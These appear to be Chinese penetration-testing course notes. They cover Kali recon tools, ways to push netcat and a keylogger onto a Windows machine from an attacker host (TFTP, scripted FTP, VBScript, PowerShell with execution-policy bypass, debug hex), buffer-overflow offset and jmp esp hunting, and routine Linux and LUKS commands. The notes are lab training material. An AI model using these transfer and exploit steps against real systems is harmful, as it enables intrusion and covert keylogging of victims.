www.shodan.io 爬网
net:211.144.145.0/24
www.shodan.io 爬网
net:211.144.145.0/24
1. dpkg -L fierce 当查看前程序生成的相关文件。
通过区域传输,得到DNS记录传输,A记录,IP地址记录,从而判断内网服务主机情况。而通常使用DNS字典爆破工具。
1. tcpdump -n -r http.cap |awk '{print $3}' |sort -u
-n 为不解析成域名,只显示IP,awk 默认以空格分割开来,此处显示第三列数据,sort -u 为剔除相同项数据。
到目前为止的课程,所介绍的工具中,最好的和最有用的就是nmap
ps -ef
apt-get
ls 命令
-l -a -h
windows下:
修改账户密码 net user admin *
查看 net user
查看账号情况 net user admin
计划任务 at (/?查看使用方法,win10已经启用)
获取exp
例如在shell中: searchsploit slmail
cp /usr/share/exploitdb/windows/remote/646.c
使用TFTP传输文件
mkdir /tftp (创建目录)
chown -R nobody /tftp (赋予权限)
cp /usr/share/windows-binaries/ (这里面有一些win下的工具)
cp /usr/share/windows-binaries/ woami.exe /tftp/
cp /usr/share/windows-binaries/ klogger.exe /tftp/
(拷了两个工具到tftp)
atftpd --daemon --port 69 /tftp
netstat -panu | grep 69 (inetd是由于权限的问题 ls /tftp/ -dl
cd /ftp ls -l chown -Rnobody /tftp/ 也就是将所有文件权限全部改为nobody )
在win端: tftp -i 192.168.1.117 get klogger.exe 获取文件
FTP
apt-get install pure-ftp
ftp配置脚本:
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd yuanfh -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
配置好后拷贝文件
cp /tftp/* /ftphome/
通过在win端写入执行文件,再远程命令运行这个文件夹,来开始下载文件
echo open 192.168.*.*>ftp.txt
echo yuanfh>> ftp.txt
echo password>>ftp.txt
echo bin>>ftp.txt
echo GET whoani.exe>>ftp.txt
echo GET klogger.exe>>ftp.txt
echo bye>>ftp.txt
ftp -s:ftp.txt
VBscript
利用http协议下载脚本
service apache2 start
netstat -pantu | grep:80
再cp文件
脚本传过去之后执行命令
csript wgetvbs http://192.168.1.117/nc.exe nc.exe
Powershell
powershell.exe -ExecutionPolicy Bypass -NoLogo -Nonlnteractive -NoProfile -Flie Wger.ps1
使用DEBUG传输文件
Debug 1.汇编反汇编 2. 16进制DUMP工具 3. 64K字节
先用UPX压缩文件 upx -9 nc.exe
再用wine的软件将nc转化成hex文件 wine /usr/share.windows-binaries/exe2.bat.exe nc.exe nc.hex
debug <nc.hex
copy 1.dll nc.exe
whoami.exe
PsExec.exe -i -s cmd
immunity debugger
输入栏输入!mona modules (!执行 mona脚本)
!mona find -s "\xff\xe4" -m openc32.dll (要查找jmp esp 的内存指令,到linux下cd /usr/share/metasploit-framework/tools中利用nasm_shell.rb,将汇编语言转换为二进制语言 ffe4)
为了防止payload直接执行被覆盖,所以定向esp之后加了 “\x90”*8 在家payload
cd /usr/share/metaspolit-framwork/tools
./pattern_create.rb 数字
自动生成唯一字符串
./pattern_offset.rb 寄存器十六进制数据
自动定位字符串所在位置。必须在tools目录下
注意导入虚拟电脑的 内存 最低保存4096,也就是4个G的内存。
/etc/apt/apt.conf apt-get请求源
.bashrc //
hdparm -i /dev/sda if AdvancedPM=yes then hdparm -B 1 -S 12 /dev/sda
代理功能
主动扫描
1、配置代理功能
1)general
给vaga设置代理服务器
2、proxy服务器
vaga充当客户端的浏览器,需要符合浏览器的一些特征
代理模式下:
被动的数据分析,有流量经过代理服务器,就会对数据进行分析
nslookup -type=a www.sina.com 指定dns服务器
熟悉常用命令:
ls、pwd、cat 、more、tail、less、watch、cp、rm、move、top、ps、grep、ifconfig、netstart、awk、sort、route、mount、dmesg、find、
kali默认采用bash(使用env查看shell类型)
ls -l 显出列表,起中:
b表示块设备(磁盘)
d 表示文件
c 表示字符型设备
l 表示链接文件
【文件类型】【创建者权限】【同组者权限】【其他组者权限】
eg: drwxr_xr_x
watch -n【时间时长,默认秒】 {后续执行命令}
eg: watch -n 2 tail -20 /var/log/message
cp 【-r 拷贝目录】
rm 【-r 删除目录】
ps 【-ef 详细服务进程】
ps 【-aux 内核进程及所占CPU】
macchanger -m xx:xx:xx:xx:xx:xx eth0 修改eth0 MAC地址
netstart -pantu 查看本机TCP与UDP链接
netstart -pantu | egrep -v '0.0.0.0|:::' |awk '{print $5}' 过滤包含0.0.0.0与:::地址并且只显示第五列信息。
/etc/resolv.conf DNS配置文件
一、拷贝系统到U盘
dmesg 系统日志(含硬件)
dd if=【文件源】 of=【目标源】bs=【每次拷贝块大小】
dd if=kali-linux.iso of=/dev/sdb bs=1M
watch -n 5 killall -USR1 dd //每5s发送dd进程进展。
二、LUKS加密方法:
windows ---DoxBox
后段:dm-crypt
前段:cryptsetup
微软的bitlocker
三、分区制作:
parted 分区工具
print devices 查看当前挂载分区
select /dev/sdb 选择/dev/sdb 分区
print 查看当前分区信息
mkpart primary(主分区) 3063(起始位置) 7063(结束位置)
四、加密分区
cryptsetup --verbose --verify-passphrase luksFormat /dev/sdb3 将分区/dev/sdb3使用luks加密
cryptsetup luksOpen /dev/sdb3 usb 打开加密分区 /dev/sdb3 并挂载目录usb下(默认在/dev/mapper/usb 下)。
mkfs.ext4 /dev/mapper/usb 使用mkfs将usb目录文件格式化成 ext4格式。
e2label /dev/mapper/usb persistence 将卷标标为持久型。
mkdir -p /mnt/usb
mount /dev/mapper/usb /mnt/usb/
echo "/ union" > /mnt/usb/persistence.conf 将“/ union”将字符传递给持久加密USB配置文件。
umount /dev/mapper/usb
cryptsetup luksClose /dev/mapper/usb 关闭加密分区
五、熟悉环境
字体调整 gnome-tweak-tool
监视网络流量
apt-get install netspeed 安装netspeed网络流量监控软件